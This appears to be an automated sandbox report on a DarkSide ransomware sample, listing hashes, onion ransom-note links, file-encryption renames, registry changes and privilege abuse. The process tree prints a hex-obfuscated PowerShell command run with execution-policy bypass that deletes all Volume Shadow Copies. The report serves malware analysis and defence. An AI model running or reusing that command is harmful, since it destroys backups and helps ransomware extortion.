Analysis
-
max time kernel
30s -
max time network
33s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
05-06-2023 09:25
Static task
static1
Behavioral task
behavioral1
Sample
Darkside.exe
Resource
win10v2004-20230220-en
General
-
Target
Darkside.exe
-
Size
59KB
-
MD5
cfcfb68901ffe513e9f0d76b17d02f96
-
SHA1
766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f
-
SHA256
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61
-
SHA512
0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c
-
SSDEEP
768:9jjV7Iax7F3DS4/S96/P3rsAc4ci5pwwX5+R4VYY23W5:vx7Fu4/i6/P3rlckx5+R4VDZ5
Malware Config
Extracted
C:\Users\README.0862cbd2.TXT
darkside
http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF
http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Renames multiple (162) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Modifies extensions of user files 20 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
Darkside.exedescription ioc process File renamed C:\Users\Admin\Pictures\CopySuspend.tiff => C:\Users\Admin\Pictures\CopySuspend.tiff.0862cbd2 Darkside.exe File renamed C:\Users\Admin\Pictures\MergeSubmit.tiff => C:\Users\Admin\Pictures\MergeSubmit.tiff.0862cbd2 Darkside.exe File opened for modification C:\Users\Admin\Pictures\MergeSubmit.tiff.0862cbd2 Darkside.exe File renamed C:\Users\Admin\Pictures\SkipResolve.tiff => C:\Users\Admin\Pictures\SkipResolve.tiff.0862cbd2 Darkside.exe File opened for modification C:\Users\Admin\Pictures\UninstallOut.tiff Darkside.exe File renamed C:\Users\Admin\Pictures\WriteRedo.png => C:\Users\Admin\Pictures\WriteRedo.png.0862cbd2 Darkside.exe File renamed C:\Users\Admin\Pictures\CopyReset.tif => C:\Users\Admin\Pictures\CopyReset.tif.0862cbd2 Darkside.exe File opened for modification C:\Users\Admin\Pictures\CopyReset.tif.0862cbd2 Darkside.exe File opened for modification C:\Users\Admin\Pictures\MergeSubmit.tiff Darkside.exe File opened for modification C:\Users\Admin\Pictures\CopySuspend.tiff Darkside.exe File opened for modification C:\Users\Admin\Pictures\CopySuspend.tiff.0862cbd2 Darkside.exe File renamed C:\Users\Admin\Pictures\UninstallOut.tiff => C:\Users\Admin\Pictures\UninstallOut.tiff.0862cbd2 Darkside.exe File opened for modification C:\Users\Admin\Pictures\WriteRedo.png.0862cbd2 Darkside.exe File opened for modification C:\Users\Admin\Pictures\SkipResolve.tiff Darkside.exe File opened for modification C:\Users\Admin\Pictures\SkipResolve.tiff.0862cbd2 Darkside.exe File renamed C:\Users\Admin\Pictures\SaveSkip.png => C:\Users\Admin\Pictures\SaveSkip.png.0862cbd2 Darkside.exe File opened for modification C:\Users\Admin\Pictures\SaveSkip.png.0862cbd2 Darkside.exe File opened for modification C:\Users\Admin\Pictures\UninstallOut.tiff.0862cbd2 Darkside.exe File renamed C:\Users\Admin\Pictures\ConnectRevoke.png => C:\Users\Admin\Pictures\ConnectRevoke.png.0862cbd2 Darkside.exe File opened for modification C:\Users\Admin\Pictures\ConnectRevoke.png.0862cbd2 Darkside.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Darkside.exepid process 452 Darkside.exe -
Modifies registry class 5 IoCs
Processes:
Darkside.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\0862cbd2\DefaultIcon Darkside.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\0862cbd2 Darkside.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\0862cbd2\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\0862cbd2.ico" Darkside.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.0862cbd2 Darkside.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.0862cbd2\ = "0862cbd2" Darkside.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exeDarkside.exepid process 5080 powershell.exe 5080 powershell.exe 452 Darkside.exe 452 Darkside.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
Darkside.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 452 Darkside.exe Token: SeSecurityPrivilege 452 Darkside.exe Token: SeTakeOwnershipPrivilege 452 Darkside.exe Token: SeLoadDriverPrivilege 452 Darkside.exe Token: SeSystemProfilePrivilege 452 Darkside.exe Token: SeSystemtimePrivilege 452 Darkside.exe Token: SeProfSingleProcessPrivilege 452 Darkside.exe Token: SeIncBasePriorityPrivilege 452 Darkside.exe Token: SeCreatePagefilePrivilege 452 Darkside.exe Token: SeBackupPrivilege 452 Darkside.exe Token: SeRestorePrivilege 452 Darkside.exe Token: SeShutdownPrivilege 452 Darkside.exe Token: SeDebugPrivilege 452 Darkside.exe Token: SeSystemEnvironmentPrivilege 452 Darkside.exe Token: SeRemoteShutdownPrivilege 452 Darkside.exe Token: SeUndockPrivilege 452 Darkside.exe Token: SeManageVolumePrivilege 452 Darkside.exe Token: 33 452 Darkside.exe Token: 34 452 Darkside.exe Token: 35 452 Darkside.exe Token: 36 452 Darkside.exe Token: SeDebugPrivilege 5080 powershell.exe Token: SeBackupPrivilege 4764 vssvc.exe Token: SeRestorePrivilege 4764 vssvc.exe Token: SeAuditPrivilege 4764 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
Darkside.exedescription pid process target process PID 452 wrote to memory of 5080 452 Darkside.exe powershell.exe PID 452 wrote to memory of 5080 452 Darkside.exe powershell.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Darkside.exe"C:\Users\Admin\AppData\Local\Temp\Darkside.exe"1⤵
- Modifies extensions of user files
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD52247453c28acd1eb75cfe181540458a8
SHA1851fc5a9950d422d76163fdc6a453d6859d56660
SHA256358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd
SHA51242475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qbzciyq0.04b.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\README.0862cbd2.TXTFilesize
3KB
MD5b58e2411168bbdbec635cf4001635db0
SHA1c130cd9caaaa514a6b98c1168e10d44a989d191a
SHA256652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a
SHA51287e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a
-
memory/5080-137-0x0000023B2FA40000-0x0000023B2FA62000-memory.dmpFilesize
136KB
-
memory/5080-147-0x0000023B47CA0000-0x0000023B47CB0000-memory.dmpFilesize
64KB
-
memory/5080-148-0x0000023B47CA0000-0x0000023B47CB0000-memory.dmpFilesize
64KB
-
memory/5080-149-0x0000023B47CA0000-0x0000023B47CB0000-memory.dmpFilesize
64KB